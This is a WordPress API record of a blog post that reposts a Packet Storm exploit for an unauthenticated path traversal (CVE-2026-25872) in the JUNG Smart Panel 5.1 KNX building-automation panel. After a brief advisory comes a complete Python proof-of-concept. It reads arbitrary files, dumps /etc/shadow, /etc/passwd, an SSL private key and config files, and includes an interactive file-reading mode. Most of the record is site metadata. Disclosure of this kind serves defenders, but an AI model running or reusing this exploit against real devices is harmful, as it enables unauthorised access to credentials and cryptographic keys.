{"id":41046,"date":"2026-02-16T11:45:47","date_gmt":"2026-02-16T11:45:47","guid":{"rendered":"http:\/\/localhost\/?p=41046"},"modified":"2026-02-16T11:45:47","modified_gmt":"2026-02-16T11:45:47","slug":"jung-smart-panel-51-knx-l11222-path-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41046","title":{"rendered":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603"},"content":{"rendered":"

{“lastseen”:”2026-02-16T17:18:04″,”description”:”JUNG Smart Panel version 5.1 KNX L1.12.22 unauthenticated path traversal proof of concept exploit that builds on the finding from LiquidWorm…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:215603″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25872″],”sourceData”:”=============================================================================================================================================\\n | # Title : JUNG Smart Panel 5.1 KNX (L1.12.22) \u2013 Unauthenticated File Path Traversal |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.jung-group.com\/en-DE |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/215430\/ \\u0026 \\tZSL-2026-5969\\n \\n [+] Summary : An unauthenticated file path traversal vulnerability has been identified in JUNG Smart Panel 5.1 KNX firmware version L1.12.22, developed by ALBRECHT JUNG GMBH \\u0026 CO. KG.\\n The flaw allows remote attackers to read arbitrary files from the underlying operating system without authentication. By crafting a specially formed HTTP request \\n \\t\\t\\t\\t containing manipulated file paths, an attacker can retrieve sensitive system files such as configuration files, credential stores, network settings, and cryptographic material.\\n \\n [+] Successful exploitation may result in:\\n \\n Disclosure of system user accounts\\n \\n Exposure of password hashes\\n \\n Leakage of SSL private keys\\n \\n Exposure of application configuration files\\n \\n Further privilege escalation or lateral movement\\n \\n The vulnerability does not require valid credentials and can be exploited remotely over HTTP, significantly increasing its impact in exposed environments.\\n \\n CVE ID: CVE-2026-25872\\n Affected Version: L1.12.22\\n Impact: Confidentiality compromise\\n Attack Vector: Remote (Unauthenticated)\\n Severity: High \/ Critical (depending on deployment exposure)\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import sys\\n from urllib3.exceptions import InsecureRequestWarning\\n \\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\\n \\n class JUNGSmartPanelExploit:\\n def __init__(self, target_ip):\\n self.target_ip = target_ip\\n self.base_url = f\\”http:\/\/{target_ip}\\”\\n self.session = requests.Session()\\n \\n def read_file(self, file_path):\\n \\”\\”\\”\\n Read arbitrary files from the target system\\n Example: \/etc\/shadow, \/etc\/passwd, \/etc\/hostname\\n \\”\\”\\”\\n try:\\n \\n url = f\\”{self.base_url}\/\/{file_path.lstrip(‘\/’)}\\”\\n \\n response = self.session.get(\\n url,\\n timeout=10,\\n verify=False,\\n allow_redirects=False\\n )\\n \\n if response.status_code == 200 and response.text:\\n return response.text\\n else:\\n return f\\”[!] Failed to read {file_path} (Status: {response.status_code})\\”\\n \\n except Exception as e:\\n return f\\”[!] Error: {str(e)}\\”\\n \\n def exploit(self):\\n \\”\\”\\”Main exploitation function\\”\\”\\”\\n print(f\\”\\\\n[*] Targeting JUNG Smart Panel at {self.target_ip}\\”)\\n print(\\”[*] Checking vulnerability…\\”)\\n \\n test_file = \\”\/etc\/hostname\\”\\n result = self.read_file(test_file)\\n \\n if \\”Failed\\” not in result and \\”Error\\” not in result:\\n print(\\”[+] Target is VULNERABLE!\\”)\\n print(f\\”[+] Successfully read {test_file}:\\”)\\n print(\\”-\\” * 50)\\n print(result.strip())\\n print(\\”-\\” * 50)\\n return True\\n else:\\n print(\\”[-] Target may not be vulnerable or is unreachable\\”)\\n return False\\n \\n def dump_sensitive_files(self):\\n \\”\\”\\”Dump common sensitive files\\”\\”\\”\\n sensitive_files = [\\n \\”\/etc\/shadow\\”,\\n \\”\/etc\/passwd\\”,\\n \\”\/etc\/hostname\\”,\\n \\”\/etc\/network\/interfaces\\”,\\n \\”\/etc\/hosts\\”,\\n \\”\/proc\/version\\”,\\n \\”\/proc\/cpuinfo\\”,\\n \\”\/var\/www\/html\/config.php\\”,\\n \\”\/etc\/ssl\/private\/ssl-cert-snakeoil.key\\”\\n ]\\n \\n print(\\”\\\\n[*] Dumping sensitive files…\\”)\\n for file_path in sensitive_files:\\n print(f\\”\\\\n[\\u003e] Reading: {file_path}\\”)\\n print(\\”-\\” * 40)\\n content = self.read_file(file_path)\\n print(content[:200] + \\”…\\” if len(content) \\u003e 200 else content)\\n print(\\”-\\” * 40)\\n \\n def main():\\n if len(sys.argv) \\u003c 2:\\n print(f\\”Usage: {sys.argv[0]} \\u003ctarget_ip\\u003e\\”)\\n print(f\\”Example: {sys.argv[0]} 17.17.17.17\\”)\\n sys.exit(1)\\n \\n target = sys.argv[1]\\n exploit = JUNGSmartPanelExploit(target)\\n \\n if exploit.exploit():\\n print(\\”\\\\n[*] Interactive mode – Enter file paths to read (or ‘quit’):\\”)\\n while True:\\n file_path = input(\\”\\\\n[?] File path (e.g., \/etc\/shadow): \\”).strip()\\n if file_path.lower() == ‘quit’:\\n break\\n if file_path:\\n content = exploit.read_file(file_path)\\n print(content)\\n \\n if __name__ == \\”__main__\\”:\\n print(\\”=\\” * 60)\\n print(\\”JUNG Smart Panel 5.1 KNX File Disclosure Exploit\\”)\\n print(\\”ZSL-2026-5969 | CVE-2026-25872\\”)\\n print(\\”=\\” * 60)\\n main()\\n \\t\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215603″,”cvss”:{“score”:6.9,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:L\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215603\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-16T17:18:04″,”description”:”JUNG Smart Panel version 5.1 KNX L1.12.22 unauthenticated path traversal proof of concept exploit that builds on the finding from LiquidWorm…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Panel 5.1…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,48,12,21,13,53,7,11,5],"class_list":["post-41046","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-69","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41046\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-16T17:18:04″,”description”:”JUNG Smart Panel version 5.1 KNX L1.12.22 unauthenticated path traversal proof of concept exploit that builds on the finding from LiquidWorm…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Panel 5.1...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41046\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T11:45:47+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603\",\"datePublished\":\"2026-02-16T11:45:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046\"},\"wordCount\":848,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.9\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41046#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046\",\"name\":\"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T11:45:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41046\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41046#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41046","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem","og_description":"{“lastseen”:”2026-02-16T17:18:04″,”description”:”JUNG Smart Panel version 5.1 KNX L1.12.22 unauthenticated path traversal proof of concept exploit that builds on the finding from LiquidWorm…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Panel 5.1...","og_url":"https:\/\/zero.redgem.net\/?p=41046","og_site_name":"zero redgem","article_published_time":"2026-02-16T11:45:47+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41046#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41046"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603","datePublished":"2026-02-16T11:45:47+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41046"},"wordCount":848,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.9","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41046#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41046","url":"https:\/\/zero.redgem.net\/?p=41046","name":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T11:45:47+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41046#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41046"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41046#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 JUNG Smart Panel 5.1 KNX (L1.12.22) Path Traversal_PACKETSTORM:215603"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41046","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41046"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41046\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41046"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41046"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41046"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}